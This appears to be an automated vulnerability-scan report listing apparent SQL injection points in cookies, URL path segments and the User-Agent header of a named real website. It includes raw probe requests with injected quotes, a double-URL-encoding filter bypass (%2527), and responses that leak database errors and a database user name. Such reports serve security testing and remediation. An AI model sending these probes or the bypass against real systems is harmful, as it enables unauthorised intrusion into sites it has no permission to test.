HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:25:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:25:57 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:25:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/62-urchin/94-exclude-bots-in-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:09:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/94-exclude-bots-in-urchin.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:09:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:09:15 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:09:15 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22465
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:22:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:22:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:34:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:34:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics.feed?type=rss HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:26:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics.feed?type=rss HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:26:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:26:54 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:26:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29089
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics.html?type=atom HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:34:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics.html?type=atom HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:34:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:34:19 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:34:19 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29400
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog%2527/googleanalytics.html?start=5 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:47:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog%2527%2527/googleanalytics.html?start=5 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:47:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics.html'?start=5 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:48:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics.html''?start=5 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:48:42 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:48:45 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:48:45 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29851
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics.html?start=5 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:45:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics.html?start=5 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'' Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:46:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:46:03 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:46:03 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29839
